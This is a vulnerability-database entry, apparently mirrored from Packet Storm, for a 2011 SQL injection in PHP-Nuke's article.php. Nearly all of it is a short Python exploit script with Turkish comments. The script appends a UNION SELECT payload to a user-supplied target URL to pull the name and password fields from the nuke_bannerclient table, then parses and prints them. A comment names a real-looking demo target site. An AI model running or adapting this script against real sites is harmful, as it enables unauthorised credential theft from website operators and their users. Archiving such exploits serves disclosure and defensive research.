Lucene search
K

PHP-Nuke article.php SQL Injection

🗓️ 14 Aug 2011 00:00:00Reported by darkTRType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

PHP-Nuke article.php SQL Injection exploi

Code
`# Coded By : darkTR - CodeHunters  
#http://www.1337day.com/exploits/16550  
#Demo : http://www.moravanszky.com/article.php?sid=24  
#Site adresini açýklý kýsým olarak girin www.site.com/article.php?sid=24 þeklinde  
  
import re, time, urllib2  
  
hedef = raw_input("Site adiniz giriniz:")  
  
sorgu = "+union+select+1,2,3,4,5,concat(0x3a3a3a,name,0x3a3a3a,passwd,0x3a3a3a),7,8,9+from+nuke_bannerclient"  
  
okunacak_adres = hedef+sorgu  
  
okunan = urllib2.urlopen(okunacak_adres).read()  
  
arama = re.search("(.*):::(.*:::.*):::(.*)",okunan)  
  
if arama:  
son = arama.group(2)  
user = son.split(":::")[0]  
password = son.split(":::")[1]  
  
  
print "user:" + user  
print "password" + password  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation